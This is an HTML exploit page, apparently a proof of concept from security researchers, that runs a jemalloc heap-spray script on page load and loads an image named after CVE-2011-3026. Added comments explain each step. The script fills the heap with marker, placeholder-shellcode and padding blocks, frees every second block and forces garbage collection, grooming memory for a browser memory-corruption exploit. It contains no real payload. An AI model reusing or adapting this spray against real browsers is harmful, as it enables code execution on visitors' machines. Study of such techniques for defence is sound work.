<html>
<head>
<script>
/**
 * Builds `blocks` strings, each assembled as marker + content + padding and
 * grown by doubling until it is at least `size / 2` UTF-16 code units long,
 * keeps them in an array, then releases every second entry and calls
 * trigger_gc() before returning the array.
 *
 * @param {number} blocks - number of strings to build and keep in the array
 * @param {number} size - nominal block size; the code works with size / 2
 *   because string lengths below are counted in UTF-16 code units (each
 *   unescape("%uXXXX") escape yields one code unit)
 * @returns {Array} the array of strings, with every even-indexed slot set to null
 *
 * Review notes: the loop index `i` is assigned without var/let and therefore
 * becomes an implicit global shared with trigger_gc(); the alert() and the
 * Math.asin / Math.atan2 calls labelled "for debugging" do not influence the
 * returned array and are presumably debugger breakpoint markers - confirm.
 */
function jemalloc_spray(blocks, size)
{
// Copyright (c) 2012 Patroklos Argyroudis <argp at domain census-labs.com>
// Copyright (c) 2012 Chariton Karamitas <huku at domain census-labs.com>
// Copyright (c) 2012 Census, Inc. (http://www.census-labs.com/)
// length budget in UTF-16 code units; presumably `size` is a byte count, hence the halving
var block_size = size / 2;
// rop/bootstrap/whatever
// "%ubeef%udead" is two code units; doubled below to four
var marker = unescape("%ubeef%udead");
marker += marker;
// shellcode/payload
// doubled until it covers at least half of block_size
var content = unescape("%u6666%u6666");
while(content.length < (block_size / 2))
{
content += content;
}
var arr = [];
// NOTE: `i` is not declared here - implicit global (see header note)
for(i = 0; i < blocks; i++)
{
// construct the random block padding (corelanc0d3r's trick)
// each rndN is an integer in 0..15 (Math.random() * 1000, floored, mod 16)
var rnd1 = Math.floor(Math.random() * 1000) % 16;
var rnd2 = Math.floor(Math.random() * 1000) % 16;
var rnd3 = Math.floor(Math.random() * 1000) % 16;
var rnd4 = Math.floor(Math.random() * 1000) % 16;
// two "%u" escapes built from the decimal digit strings of rnd1..rnd4
var rndstr = "%u" + rnd1.toString() + rnd2.toString();
rndstr += "%u" + rnd3.toString() + rnd4.toString();
var padding = unescape(rndstr);
// doubled until it fills whatever the marker and content leave of block_size
while(padding.length < block_size - marker.length - content.length)
{
padding += padding;
}
// construct the block
var block = marker + content + padding;
// if required repeat the block
// doubling can overshoot block_size; no trimming is done
while(block.length < block_size)
{
block += block;
}
// spray block
// substr(0) returns the same characters; presumably meant to obtain a fresh
// string value rather than a reference to `block` - engine-dependent, verify
arr[i] = block.substr(0);
}
// for debugging
// result discarded; likely a breakpoint marker for a debugger session
Math.asin(1);
// release every even-indexed entry: delete the property, then store null
for(i = 0; i < blocks; i += 2)
{
delete(arr[i]);
arr[i] = null;
}
// trigger_gc() returns the 100000-element array it allocated; only its
// length is used, in the alert below
var ret = trigger_gc();
alert("After garbage collection: " + ret.length);
// for debugging
// result discarded; likely a second breakpoint marker
Math.atan2(6, 6);
return arr;
}
/**
 * Allocation-churn helper: fills an array with 100000 empty arrays and
 * returns it. The name suggests the intent is to provoke a garbage
 * collection; whether one actually runs is engine-dependent and is not
 * checked here. Uses the implicit global `i` (no var/let), as
 * jemalloc_spray does.
 *
 * @returns {Array} the array of 100000 empty arrays
 */
function trigger_gc()
{
var gc = [];
for(i = 0; i < 100000; i++)
{
gc[i] = new Array();
}
return gc;
}
// 1000 spray blocks of size 630 (target run size: 1024)
// Runs while the <head> script is parsed, before the body exists. The
// returned array is held in the global `foo` so the strings stay reachable
// for the lifetime of the page; `var` at top level also makes it a window
// property.
var foo = jemalloc_spray(1000, 630);
// alert(foo.length);
</script>
</head>
<body>
CVE-2011-3026 is fun
<p><img src="cve-2011-3026.png">
</body>
</html>